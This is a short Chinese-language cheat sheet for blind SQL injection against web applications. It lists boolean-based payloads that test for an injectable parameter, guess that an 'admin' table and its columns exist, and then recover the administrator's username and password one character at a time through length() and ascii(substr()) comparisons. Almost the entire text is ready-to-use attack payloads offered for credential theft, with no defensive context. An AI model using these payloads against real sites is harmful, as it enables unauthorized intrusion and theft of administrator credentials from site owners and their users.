日常判断注入点 and 1=1
and 1=2
爆破手段:
判断表
and (select count(*) from admin)<>0 返回正常,则有admin表,否则,无
判断列名
and (select count(列名) forom admin) <> 0 返回正常,则有该列名,否则,无
爆管理员账号密码:
先判断管理员账户字符长度
and (select count(*) from admin where length(name(此处是表中管理员账户的列名)) >= num) =1 这里的num是猜测的数字(但是如果开发者在建表时针对用户名的数据类型使用的是char而不是varchar呢)
爆用户名的第一个,第二个,第三个。。。。字符
and (select count(*) from admin where ascii(substr(name,1,1)) >=num) =1这里的num是猜测的数字,再对照ascii表去找出对应的字符
and (select count(*) from admin where ascii(substr(name,2,1)) >=num) =1
and (select count(*) from admin where ascii(substr(name,3,1)) >=num) =1
......
依次爆出账户名的全部字符
判断密码的字符长度
and (select count(*) from admin where length(pwd(此处是表中管理员密码的列名)) >= num) =1
爆密码的第一个,第二个,第三个。。。。字符
and (select count(*) from admin where ascii(substr(pwd,1,1)) >=num) =1
and (select count(*) from admin where ascii(substr(pwd,2,1)) >=num) =1
and (select count(*) from admin where ascii(substr(pwd,3,1)) >=num) =1
......
依次爆出密码的全部字符